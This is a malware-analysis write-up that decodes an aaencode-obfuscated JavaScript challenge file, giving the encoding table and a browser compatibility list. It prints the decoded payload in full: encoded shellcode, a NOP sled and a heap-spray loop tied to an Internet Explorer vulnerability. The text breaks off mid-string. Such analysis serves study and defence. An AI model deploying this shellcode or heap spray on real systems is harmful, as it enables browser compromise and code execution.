Author: Tsukasa Ooi
Date: 2010/11/23-29
This type of JavaScript is very famous in Japan. It does not mean this is famous as a threat. But its author -- Yosuke Hasegawa -- is very famous in Japan. He transforms JavaScript into interesting and various styles.
Obviously, this script is generated by his creation, aaencode. First, I will try deobfuscate the script using its source code. aaencode's source code is embedded as a JavaScript in the site above so I (and you) can get one.
Now, I assume target's script is generated by aaencode and I will make `aadecode' that decode/deobfuscate the script generated by aaencode. Important part is `aaencode' function in the generator. Generating script is very simple and only few characters are used for encoding except header and footer. I will show you the convertion table.
\ | (゚Д゚)[゚ε゚] |
u | (o゚ー゚o) |
0 | (c^_^o) |
1 | (゚Θ゚) |
2 | ((o^_^o) - (゚Θ゚)) |
3 | (o^_^o) |
4 | (゚ー゚) |
5 | ((゚ー゚) + (゚Θ゚)) |
6 | ((o^_^o) +(o^_^o)) |
7 | ((゚ー゚) + (o^_^o)) |
8 | ((゚ー゚) + (゚ー゚)) |
9 | ((゚ー゚) + (゚ー゚) + (゚Θ゚)) |
a | (゚Д゚) .゚ω゚ノ |
b | (゚Д゚) .゚Θ゚ノ |
c | (゚Д゚) ['c'] |
d | (゚Д゚) .゚ー゚ノ |
e | (゚Д゚) .゚Д゚ノ |
f | (゚Д゚) [゚Θ゚] |
Each character is escaped (in \ooo form or \uxxxx form) and transcoded. The obfuscated string is generated just concatinating each character. This script executed using eval technique.
aadecode recovers original characters in the script using the table above and unescapes it. Web-Challenge.html contains two obfuscated scripts and aadecode can decode both scripts without any errors.
This is intermediate (escaped) result below.
\141\154\145\162\164\50\42\167\145\40\154\157\166\145\40\101\123\105\103\40\53\137\53\42\51
\162\162\162\142\75\40\50\42\167\157\60\157\61\60\105\102\167\157\60\157\64\102\65\102\167\157\60\157\103\71\63\63\167\157\60\157\102\71\66\66\167\157\60\157\60\63\70\63\167\157\60\157\63\64\70\60\167\157\60\157\104\61\60\102\167\157\60\157\106\101\105\62\167\157\60\157\60\65\105\102\167\157\60\157\105\102\105\70\167\157\60\157\106\106\106\106\167\157\60\157\63\70\106\106\167\157\60\157\104\63\60\67\167\157\60\157\104\61\104\61\167\157\60\157\102\65\70\105\167\157\60\157\105\61\67\60\167\157\60\157\104\61\104\61\167\157\60\157\65\101\104\61\167\157\60\157\104\104\71\61\167\157\60\157\101\61\65\101\167\157\60\157\67\103\103\104\167\157\60\157\102\71\65\101\167\157\60\157\65\101\104\71\167\157\60\157\102\102\62\66\167\157\60\157\70\70\104\64\167\157\60\157\70\103\63\71\167\157\60\157\104\61\104\60\167\157\60\157\63\63\104\61\167\157\60\157\71\61\62\70\167\157\60\157\105\71\65\61\167\157\60\157\101\64\61\62\167\157\60\157\65\70\62\102\167\157\60\157\105\65\71\67\167\157\60\157\101\63\102\71\167\157\60\157\104\61\101\65\167\157\60\157\102\71\104\61\167\157\60\157\101\62\102\103\167\157\60\157\102\62\101\67\167\157\60\157\60\104\65\101\167\157\60\157\103\61\63\101\167\157\60\157\62\105\70\62\167\157\60\157\105\65\101\67\167\157\60\157\62\105\65\101\167\157\60\157\65\101\70\64\167\157\60\157\65\101\63\104\167\157\60\157\65\103\103\67\167\157\60\157\104\64\70\63\167\157\60\157\63\63\62\105\167\157\60\157\63\101\63\71\167\157\60\157\62\105\62\105\167\157\60\157\70\102\62\105\167\157\60\157\102\102\70\102\167\157\60\157\70\70\104\64\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\60\106\63\167\157\60\157\104\61\104\61\167\157\60\157\62\70\63\63\167\157\60\157\102\71\70\103\167\157\60\157\102\106\102\105\167\157\60\157\104\61\104\61\167\157\60\157\101\64\102\71\167\157\60\157\102\104\101\63\167\157\60\157\65\101\102\103\167\157\60\157\63\101\60\104\167\157\60\157\70\62\103\61\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\103\67\65\101\167\157\60\157\70\63\65\103\167\157\60\157\62\105\104\64\167\157\60\157\63\71\63\63\167\157\60\157\62\105\63\101\167\157\60\157\62\105\62\105\167\157\60\157\70\102\70\102\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\61\62\63\167\157\60\157\104\61\104\61\167\157\60\157\102\71\70\103\167\157\60\157\105\62\102\104\167\157\60\157\104\61\105\63\167\157\60\157\101\62\102\71\167\157\60\157\102\64\102\71\167\157\60\157\65\101\102\104\167\157\60\157\63\101\60\104\167\157\60\157\70\62\103\61\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\103\67\65\101\167\157\60\157\70\63\65\103\167\157\60\157\62\105\104\64\167\157\60\157\63\71\63\63\167\157\60\157\62\105\63\101\167\157\60\157\62\105\62\105\167\157\60\157\70\102\70\102\167\157\60\157\65\101\70\64\167\157\60\157\63\71\63\71\167\157\60\157\104\61\61\65\167\157\60\157\104\61\104\61\167\157\60\157\66\105\63\71\167\157\60\157\104\61\104\61\167\157\60\157\70\103\104\61\167\157\60\157\63\104\65\60\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\60\104\65\101\167\157\60\157\102\71\70\62\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\70\67\62\105\167\157\60\157\65\70\104\65\167\157\60\157\105\71\70\106\167\157\60\157\104\65\61\66\167\157\60\157\102\104\104\62\167\157\60\157\102\66\102\105\167\157\60\157\61\66\106\106\167\157\60\157\104\62\71\65\167\157\60\157\102\66\104\65\167\157\60\157\102\67\102\70\167\157\60\157\105\62\104\61\167\157\60\157\70\61\61\61\167\157\60\157\70\62\70\61\167\157\60\157\60\67\65\101\167\157\60\157\61\63\65\62\167\157\60\157\70\63\101\101\167\157\60\157\62\105\70\61\167\157\60\157\106\71\70\67\167\157\60\157\63\104\65\60\167\157\60\157\104\60\104\61\167\157\60\157\104\61\104\61\167\157\60\157\60\104\65\101\167\157\60\157\61\61\105\62\167\157\60\157\102\102\70\61\167\157\60\157\70\62\103\102\167\157\60\157\62\105\70\61\167\157\60\157\105\61\70\67\167\157\60\157\61\101\65\101\167\157\60\157\65\61\71\60\167\157\60\157\104\61\105\70\167\157\60\157\62\102\101\64\167\157\60\157\104\60\61\66\167\157\60\157\102\60\70\104\167\157\60\157\102\66\102\104\167\157\60\157\71\60\61\66\167\157\60\157\106\106\104\65\167\157\60\157\101\71\102\64\167\157\60\157\61\66\102\64\167\157\60\157\104\71\71\60\167\157\60\157\104\61\104\61\167\157\60\157\104\61\104\61\167\157\60\157\70\106\65\70\167\157\60\157\62\105\105\104\167\157\60\157\105\104\101\67\167\157\60\157\101\67\62\105\167\157\60\157\63\71\105\71\167\157\60\157\104\61\64\64\167\157\60\157\104\61\104\61\167\157\60\157\61\61\105\62\167\157\60\157\103\65\63\101\167\157\60\157\62\105\70\61\167\157\60\157\105\104\101\67\167\157\60\157\101\67\62\105\167\157\60\157\65\101\105\65\167\157\60\157\70\64\62\105\167\157\60\157\63\104\65\101\167\157\60\157\70\67\65\101\167\157\60\157\65\103\104\71\167\157\60\157\104\64\70\63\167\157\60\157\63\63\62\105\167\157\60\157\63\66\63\71\167\157\60\157\62\105\62\105\167\157\60\157\102\71\62\105\167\157\60\157\104\62\63\71\167\157\60\157\104\61\104\61\167\157\60\157\70\67\62\105\167\157\60\157\62\105\103\61\167\157\60\157\105\71\101\67\167\157\60\157\70\67\62\105\167\157\60\157\65\60\104\104\167\157\60\157\104\65\61\65\167\157\60\157\104\61\104\63\167\157\60\157\105\62\104\61\167\157\60\157\102\102\61\70\167\157\60\157\70\60\104\62\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\102\63\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\70\61\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\70\103\167\157\60\157\62\105\70\60\167\157\60\157\106\104\70\67\167\157\60\157\62\105\70\60\167\157\60\157\103\65\70\67\167\157\60\157\70\67\70\60\167\157\60\157\101\64\65\101\167\157\60\157\65\101\105\104\167\157\60\157\106\106\101\65\167\157\60\157\104\62\101\71\167\157\60\157\70\67\62\64\167\157\60\157\101\67\65\101\167\157\60\157\104\62\106\61\167\157\60\157\105\62\62\64\167\157\60\157\71\70\61\70\167\157\60\157\67\103\71\60\167\157\60\157\61\64\104\62\167\157\60\157\60\101\105\62\167\157\60\157\66\106\104\105\167\157\60\157\105\102\103\61\167\157\60\157\101\65\60\67\167\157\60\157\61\60\104\71\167\157\60\157\104\103\61\101\167\157\60\157\60\102\104\62\167\157\60\157\63\101\71\61\167\157\60\157\105\101\62\60\167\157\60\157\101\64\103\105\167\157\60\157\70\106\63\66\167\157\60\157\70\106\65\101\167\157\60\157\104\62\106\65\167\157\60\157\102\67\60\103\167\157\60\157\104\104\65\101\167\157\60\157\65\101\71\101\167\157\60\157\103\104\70\106\167\157\60\157\60\103\104\62\167\157\60\157\104\65\65\101\167\157\60\157\104\62\65\101\167\157\60\157\67\101\61\64\167\157\60\157\70\70\70\106\167\157\60\157\70\64\61\62\167\157\60\157\63\104\65\101\167\157\60\157\63\104\65\62\167\157\60\157\70\63\70\65\167\157\60\157\70\62\70\60\167\157\60\157\70\66\70\67\167\157\60\157\101\103\65\103\167\157\60\157\66\70\67\104\167\157\60\157\104\61\103\64\167\157\60\157\104\61\104\61\167\157\60\157\61\104\66\71\167\157\60\157\61\104\61\104\167\157\60\157\62\62\61\104\167\157\60\157\61\66\67\101\167\157\60\157\62\104\71\64\167\157\60\157\104\61\104\61\167\157\60\157\104\61\104\61\167\157\60\157\61\67\65\101\167\157\60\157\61\61\65\62\167\157\60\157\70\61\71\61\167\157\60\157\71\64\65\101\167\157\60\157\70\61\104\71\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\71\167\157\60\157\104\71\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\71\167\157\60\157\62\71\101\103\167\157\60\157\101\64\104\61\167\157\60\157\105\62\104\66\167\157\60\157\63\70\61\61\167\157\60\157\104\61\61\104\167\157\60\157\104\61\104\61\167\157\60\157\61\106\65\101\167\157\60\157\61\60\65\62\167\157\60\157\70\60\71\65\167\157\60\157\71\103\65\101\167\157\60\157\70\60\104\104\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\71\167\157\60\157\104\71\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\65\167\157\60\157\62\65\101\103\167\157\60\157\101\64\104\61\167\157\60\157\105\62\104\66\167\157\60\157\63\70\61\61\167\157\60\157\104\61\67\104\167\157\60\157\104\61\104\61\167\157\60\157\71\64\61\66\167\157\60\157\104\61\63\104\167\157\60\157\104\61\104\61\167\157\60\157\65\101\104\61\167\157\60\157\62\65\70\64\167\157\60\157\102\102\70\63\167\157\60\157\102\102\104\60\167\157\60\157\65\101\104\67\167\157\60\157\65\62\60\67\167\157\60\157\71\71\61\63\167\157\60\157\62\105\70\63\167\157\60\157\106\61\70\67\167\157\60\157\61\65\65\62\167\157\60\157\66\71\103\61\167\157\60\157\104\61\104\60\167\157\60\157\104\61\104\61\167\157\60\157\61\61\65\64\167\157\60\157\102\105\101\65\167\157\60\157\71\103\65\101\167\157\60\157\70\60\62\71\167\157\60\157\104\60\102\102\167\157\60\157\104\60\102\102\167\157\60\157\70\64\65\103\167\157\60\157\70\63\62\61\167\157\60\157\70\67\62\105\167\157\60\157\65\62\103\104\167\157\60\157\103\61\61\65\167\157\60\157\71\64\65\70\167\157\60\157\65\62\62\104\167\157\60\157\62\104\101\103\167\157\60\157\101\64\104\61\167\157\60\157\63\101\104\63\167\157\60\157\65\101\70\63\167\157\60\157\63\104\71\64\167\157\60\157\61\61\65\62\167\157\60\157\65\70\104\60\167\157\60\157\63\104\71\64\167\157\60\157\101\103\65\62\167\157\60\157\104\67\63\104\167\157\60\157\104\63\101\105\167\157\60\157\61\70\63\101\167\157\60\157\71\103\65\101\167\157\60\157\65\60\62\61\167\157\60\157\62\105\63\60\167\157\60\157\104\61\104\61\167\157\60\157\65\64\104\61\167\157\60\157\101\65\61\70\167\157\60\157\65\101\106\61\167\157\60\157\62\61\70\64\167\157\60\157\63\63\65\60\167\157\60\157\104\61\62\105\167\157\60\157\104\61\104\61\167\157\60\157\105\106\66\70\167\157\60\157\104\61\104\61\167\157\60\157\65\60\104\61\167\157\60\157\62\105\63\60\167\157\60\157\104\61\104\61\167\157\60\157\105\101\104\61\167\157\60\157\101\65\60\60\167\157\60\157\65\102\104\71\167\157\60\157\62\61\71\64\167\157\60\157\105\106\105\65\167\157\60\157\71\64\65\71\167\157\60\157\65\101\62\61\167\157\60\157\62\65\71\103\167\157\60\157\102\102\70\60\167\157\60\157\102\102\104\60\167\157\60\157\65\103\104\60\167\157\60\157\62\61\70\64\167\157\60\157\62\105\70\63\167\157\60\157\106\61\70\67\167\157\60\157\61\65\65\62\167\157\60\157\63\101\103\61\167\157\60\157\65\101\65\71\167\157\60\157\62\71\71\64\167\157\60\157\62\105\70\61\167\157\60\157\106\65\70\67\167\157\60\157\61\65\65\62\167\157\60\157\65\101\104\65\167\157\60\157\62\65\71\103\167\157\60\157\62\105\70\60\167\157\60\157\106\65\70\67\167\157\60\157\61\65\65\62\167\157\60\157\66\71\104\65\167\157\60\157\104\61\104\60\167\157\60\157\104\61\104\61\167\157\60\157\70\106\70\105\167\157\60\157\70\70\70\101\167\157\60\157\65\62\70\102\167\157\60\157\70\65\61\65\167\157\60\157\63\64\65\101\167\157\60\157\61\62\70\103\167\157\60\157\106\64\63\71\167\157\60\157\62\105\62\103\167\157\60\157\65\106\62\105\167\157\60\157\104\106\71\106\167\157\60\157\105\62\63\104\167\157\60\157\65\102\61\102\167\157\60\157\64\71\70\101\167\157\60\157\65\102\62\106\167\157\60\157\106\64\104\106\167\157\60\157\62\105\66\61\167\157\60\157\66\61\61\63\167\157\60\157\106\103\71\70\167\157\60\157\101\65\60\101\167\157\60\157\71\71\103\106\167\157\60\157\102\106\61\103\167\157\60\157\106\106\101\104\167\157\60\157\67\65\63\60\167\157\60\157\104\106\101\70\167\157\60\157\60\71\63\66\167\157\60\157\67\66\65\102\167\157\60\157\70\71\63\66\167\157\60\157\64\106\71\104\167\157\60\157\105\67\60\101\167\157\60\157\106\105\103\102\167\157\60\157\70\106\101\61\167\157\60\157\63\60\66\101\167\157\60\157\103\63\103\101\167\157\60\157\61\101\104\63\167\157\60\157\105\60\103\64\167\157\60\157\105\62\105\63\167\157\60\157\105\64\105\65\167\157\60\157\105\66\105\67\167\157\60\157\105\70\105\71\167\157\60\157\104\61\105\61\167\157\60\157\101\63\104\61\167\157\60\157\106\101\102\63\167\157\60\157\101\66\104\61\167\157\60\157\106\101\102\63\167\157\60\157\71\103\104\61\167\157\60\157\64\61\70\102\167\157\60\157\104\62\104\61\167\157\60\157\104\61\104\61\167\157\60\157\71\70\104\61\167\157\60\157\70\71\71\64\167\157\60\157\71\104\70\61\167\157\60\157\70\63\71\105\167\157\60\157\106\106\71\64\167\157\60\157\70\71\71\64\167\157\60\157\104\61\71\64\167\157\60\157\101\61\102\105\167\157\60\157\102\106\102\64\167\157\60\157\102\71\104\61\167\157\60\157\101\65\101\65\167\157\60\157\105\102\101\61\167\157\60\157\106\105\106\105\167\157\60\157\101\66\101\66\167\157\60\157\106\106\101\66\167\157\60\157\102\71\102\60\167\157\60\157\102\104\102\106\167\157\60\157\102\63\102\60\167\157\60\157\102\62\106\106\167\157\60\157\102\103\102\105\167\157\60\157\102\101\104\61\167\157\60\157\101\70\102\64\167\157\60\157\105\102\106\61\167\157\60\157\102\71\106\61\167\157\60\157\102\104\102\64\167\157\60\157\102\105\102\104\167\157\60\157\71\60\106\61\167\157\60\157\71\64\70\62\167\157\60\157\71\61\71\62\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\71\61\106\60\167\157\60\157\104\61\106\60\42\51\73\162\162\162\141\75\165\156\145\163\143\141\160\145\50\162\162\162\142\56\162\145\160\154\141\143\145\50\57\167\157\60\157\57\147\54\42\45\165\42\51\51\73\40\166\141\162\40\162\162\162\141\142\142\142\40\75\40\60\170\70\66\60\60\60\55\50\162\162\162\141\56\154\145\156\147\164\150\52\62\51\73\167\167\167\167\167\167\167\167\167\167\75\165\156\145\163\143\141\160\145\50\47\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\45\165\71\60\71\60\47\51\73\40\167\150\151\154\145\50\167\167\167\167\167\167\167\167\167\167\56\154\145\156\147\164\150\74\162\162\162\141\142\142\142\57\62\51\40\173\40\167\167\167\167\167\167\167\167\167\167\53\75\167\167\167\167\167\167\167\167\167\167\73\40\175\40\166\141\162\40\142\151\147\142\154\157\143\153\40\75\40\167\167\167\167\167\167\167\167\167\167\56\163\165\142\163\164\162\151\156\147\50\60\54\162\162\162\141\142\142\142\57\62\51\73\40\155\145\155\40\75\40\156\145\167\40\101\162\162\141\171\50\51\73\40\146\157\162\50\151\75\60\73\40\151\74\61\65\60\60\73\40\151\53\53\51\40\173\155\145\155\133\151\135\40\75\40\142\151\147\142\154\157\143\153\40\53\40\142\151\147\142\154\157\143\153\40\53\40\162\162\162\141\73\175\40\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\164\141\142\154\145\40\163\164\171\154\145\75\160\157\163\151\164\151\157\156\72\141\142\163\157\154\165\164\145\73\143\154\151\160\72\162\145\143\164\50\60\51\76\42\51\73
And now the unescaped one.
alert("we love ASEC +_+")
rrrb= ("wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2wo0o05EBwo0oEBE8wo0oFFFFwo0o38FFwo0oD307wo0oD1D1wo0oB58Ewo0oE170wo0oD1D1wo0o5AD1wo0oDD91wo0oA15Awo0o7CCDwo0oB95Awo0o5AD9wo0oBB26wo0o88D4wo0o8C39wo0oD1D0wo0o33D1wo0o9128wo0oE951wo0oA412wo0o582Bwo0oE597wo0oA3B9wo0oD1A5wo0oB9D1wo0oA2BCwo0oB2A7wo0o0D5Awo0oC13Awo0o2E82wo0oE5A7wo0o2E5Awo0o5A84wo0o5A3Dwo0o5CC7wo0oD483wo0o332Ewo0o3A39wo0o2E2Ewo0o8B2Ewo0oBB8Bwo0o88D4wo0o5A84wo0o3939wo0oD0F3wo0oD1D1wo0o2833wo0oB98Cwo0oBFBEwo0oD1D1wo0oA4B9wo0oBDA3wo0o5ABCwo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD123wo0oD1D1wo0oB98Cwo0oE2BDwo0oD1E3wo0oA2B9wo0oB4B9wo0o5ABDwo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD115wo0oD1D1wo0o6E39wo0oD1D1wo0o8CD1wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0oB982wo0oD0D1wo0oD1D1wo0o872Ewo0o58D5wo0oE98Fwo0oD516wo0oBDD2wo0oB6BEwo0o16FFwo0oD295wo0oB6D5wo0oB7B8wo0oE2D1wo0o8111wo0o8281wo0o075Awo0o1352wo0o83AAwo0o2E81wo0oF987wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0o11E2wo0oBB81wo0o82CBwo0o2E81wo0oE187wo0o1A5Awo0o5190wo0oD1E8wo0o2BA4wo0oD016wo0oB08Dwo0oB6BDwo0o9016wo0oFFD5wo0oA9B4wo0o16B4wo0oD990wo0oD1D1wo0oD1D1wo0o8F58wo0o2EEDwo0oEDA7wo0oA72Ewo0o39E9wo0oD144wo0oD1D1wo0o11E2wo0oC53Awo0o2E81wo0oEDA7wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0o875Awo0o5CD9wo0oD483wo0o332Ewo0o3639wo0o2E2Ewo0oB92Ewo0oD239wo0oD1D1wo0o872Ewo0o2EC1wo0oE9A7wo0o872Ewo0o50DDwo0oD515wo0oD1D3wo0oE2D1wo0oBB18wo0o80D2wo0o175Awo0o1152wo0o81B3wo0o175Awo0o1152wo0o8181wo0o175Awo0o1152wo0o818Cwo0o2E80wo0oFD87wo0o2E80wo0oC587wo0o8780wo0oA45Awo0o5AEDwo0oFFA5wo0oD2A9wo0o8724wo0oA75Awo0oD2F1wo0oE224wo0o9818wo0o7C90wo0o14D2wo0o0AE2wo0o6FDEwo0oEBC1wo0oA507wo0o10D9wo0oDC1Awo0o0BD2wo0o3A91wo0oEA20wo0oA4CEwo0o8F36wo0o8F5Awo0oD2F5wo0oB70Cwo0oDD5Awo0o5A9Awo0oCD8Fwo0o0CD2wo0oD55Awo0oD25Awo0o7A14wo0o888Fwo0o8412wo0o3D5Awo0o3D52wo0o8385wo0o8280wo0o8687wo0oAC5Cwo0o687Dwo0oD1C4wo0oD1D1wo0o1D69wo0o1D1Dwo0o221Dwo0o167Awo0o2D94wo0oD1D1wo0oD1D1wo0o175Awo0o1152wo0o8191wo0o945Awo0o81D9wo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5229wo0o29ACwo0oA4D1wo0oE2D6wo0o3811wo0oD11Dwo0oD1D1wo0o1F5Awo0o1052wo0o8095wo0o9C5Awo0o80DDwo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5225wo0o25ACwo0oA4D1wo0oE2D6wo0o3811wo0oD17Dwo0oD1D1wo0o9416wo0oD13Dwo0oD1D1wo0o5AD1wo0o2584wo0oBB83wo0oBBD0wo0o5AD7wo0o5207wo0o9913wo0o2E83wo0oF187wo0o1552wo0o69C1wo0oD1D0wo0oD1D1wo0o1154wo0oBEA5wo0o9C5Awo0o8029wo0oD0BBwo0oD0BBwo0o845Cwo0o8321wo0o872Ewo0o52CDwo0oC115wo0o9458wo0o522Dwo0o2DACwo0oA4D1wo0o3AD3wo0o5A83wo0o3D94wo0o1152wo0o58D0wo0o3D94wo0oAC52wo0oD73Dwo0oD3AEwo0o183Awo0o9C5Awo0o5021wo0o2E30wo0oD1D1wo0o54D1wo0oA518wo0o5AF1wo0o2184wo0o3350wo0oD12Ewo0oD1D1wo0oEF68wo0oD1D1wo0o50D1wo0o2E30wo0oD1D1wo0oEAD1wo0oA500wo0o5BD9wo0o2194wo0oEFE5wo0o9459wo0o5A21wo0o259Cwo0oBB80wo0oBBD0wo0o5CD0wo0o2184wo0o2E83wo0oF187wo0o1552wo0o3AC1wo0o5A59wo0o2994wo0o2E81wo0oF587wo0o1552wo0o5AD5wo0o259Cwo0o2E80wo0oF587wo0o1552wo0o69D5wo0oD1D0wo0oD1D1wo0o8F8Ewo0o888Awo0o528Bwo0o8515wo0o345Awo0o128Cwo0oF439wo0o2E2Cwo0o5F2Ewo0oDF9Fwo0oE23Dwo0o5B1Bwo0o498Awo0o5B2Fwo0oF4DFwo0o2E61wo0o6113wo0oFC98wo0oA50Awo0o99CFwo0oBF1Cwo0oFFADwo0o7530wo0oDFA8wo0o0936wo0o765Bwo0o8936wo0o4F9Dwo0oE70Awo0oFECBwo0o8FA1wo0o306Awo0oC3CAwo0o1AD3wo0oE0C4wo0oE2E3wo0oE4E5wo0oE6E7wo0oE8E9wo0oD1E1wo0oA3D1wo0oFAB3wo0oA6D1wo0oFAB3wo0o9CD1wo0o418Bwo0oD2D1wo0oD1D1wo0o98D1wo0o8994wo0o9D81wo0o839Ewo0oFF94wo0o8994wo0oD194wo0oA1BEwo0oBFB4wo0oB9D1wo0oA5A5wo0oEBA1wo0oFEFEwo0oA6A6wo0oFFA6wo0oB9B0wo0oBDBFwo0oB3B0wo0oB2FFwo0oBCBEwo0oBAD1wo0oA8B4wo0oEBF1wo0oB9F1wo0oBDB4wo0oBEBDwo0o90F1wo0o9482wo0o9192wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0oD1F0");rrra=unescape(rrrb.replace(/wo0o/g,"%u")); var rrrabbb = 0x86000-(rrra.length*2);wwwwwwwwww=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090'); while(wwwwwwwwww.length<rrrabbb/2) { wwwwwwwwww+=wwwwwwwwww; } var bigblock = wwwwwwwwww.substring(0,rrrabbb/2); mem = new Array(); for(i=0; i<1500; i++) {mem[i] = bigblock + bigblock + rrra;} document.write("<table style=position:absolute;clip:rect(0)>");
Second script shall be related to the vuln of IE.
Incidentally, I found several base64 string at the end of html file. By decoding base64 repeatedly, I found interesting string in the middle.
Thx hasegawa!! do you know only base64? -_-
Unfortunately, I already had decoded the script before this base64 string.
This script obfuscation is very browser-specific.
Internet Explore 6 | does not work |
Internet Explore 7 | does not work |
Internet Explore 8 | works! |
Google Chrome (4-7) | works! |
Mozilla Firefox (3.0, 3.5, 3.6) | works! |
Android 2.1 (WebKit 530.17) | works! |
iOS 4.1 (Safari/WebKit 532.9) | works! |
Opera (10, 10.50, 10.63) | works! |
Almost all of recent, modern browsers can understand this obfuscated JavaScript and can run it.
Notable thing is compatibility-mode. The obfuscated script will not run on IE8 compatibility-mode. But because of meta tag, IE8 will recognize this file in standard-compliant mode.
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
I will make second script easy to read.
// Unescape the SHELLCODE
shellcode_esc = (
"wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2" +
"wo0o05EBwo0oEBE8wo0oFFFFwo0o38FFwo0oD307wo0oD1D1wo0oB58Ewo0oE170" +
"wo0oD1D1wo0o5AD1wo0oDD91wo0oA15Awo0o7CCDwo0oB95Awo0o5AD9wo0oBB26" +
"wo0o88D4wo0o8C39wo0oD1D0wo0o33D1wo0o9128wo0oE951wo0oA412wo0o582B" +
"wo0oE597wo0oA3B9wo0oD1A5wo0oB9D1wo0oA2BCwo0oB2A7wo0o0D5Awo0oC13A" +
"wo0o2E82wo0oE5A7wo0o2E5Awo0o5A84wo0o5A3Dwo0o5CC7wo0oD483wo0o332E" +
"wo0o3A39wo0o2E2Ewo0o8B2Ewo0oBB8Bwo0o88D4wo0o5A84wo0o3939wo0oD0F3" +
"wo0oD1D1wo0o2833wo0oB98Cwo0oBFBEwo0oD1D1wo0oA4B9wo0oBDA3wo0o5ABC" +
"wo0o3A0Dwo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835C" +
"wo0o2ED4wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD123" +
"wo0oD1D1wo0oB98Cwo0oE2BDwo0oD1E3wo0oA2B9wo0oB4B9wo0o5ABDwo0o3A0D" +
"wo0o82C1wo0oA72Ewo0o5AE5wo0o842Ewo0o3D5Awo0oC75Awo0o835Cwo0o2ED4" +
"wo0o3933wo0o2E3Awo0o2E2Ewo0o8B8Bwo0o5A84wo0o3939wo0oD115wo0oD1D1" +
"wo0o6E39wo0oD1D1wo0o8CD1wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5Awo0oB982" +
"wo0oD0D1wo0oD1D1wo0o872Ewo0o58D5wo0oE98Fwo0oD516wo0oBDD2wo0oB6BE" +
"wo0o16FFwo0oD295wo0oB6D5wo0oB7B8wo0oE2D1wo0o8111wo0o8281wo0o075A" +
"wo0o1352wo0o83AAwo0o2E81wo0oF987wo0o3D50wo0oD0D1wo0oD1D1wo0o0D5A" +
"wo0o11E2wo0oBB81wo0o82CBwo0o2E81wo0oE187wo0o1A5Awo0o5190wo0oD1E8" +
"wo0o2BA4wo0oD016wo0oB08Dwo0oB6BDwo0o9016wo0oFFD5wo0oA9B4wo0o16B4" +
"wo0oD990wo0oD1D1wo0oD1D1wo0o8F58wo0o2EEDwo0oEDA7wo0oA72Ewo0o39E9" +
"wo0oD144wo0oD1D1wo0o11E2wo0oC53Awo0o2E81wo0oEDA7wo0oA72Ewo0o5AE5" +
"wo0o842Ewo0o3D5Awo0o875Awo0o5CD9wo0oD483wo0o332Ewo0o3639wo0o2E2E" +
"wo0oB92Ewo0oD239wo0oD1D1wo0o872Ewo0o2EC1wo0oE9A7wo0o872Ewo0o50DD" +
"wo0oD515wo0oD1D3wo0oE2D1wo0oBB18wo0o80D2wo0o175Awo0o1152wo0o81B3" +
"wo0o175Awo0o1152wo0o8181wo0o175Awo0o1152wo0o818Cwo0o2E80wo0oFD87" +
"wo0o2E80wo0oC587wo0o8780wo0oA45Awo0o5AEDwo0oFFA5wo0oD2A9wo0o8724" +
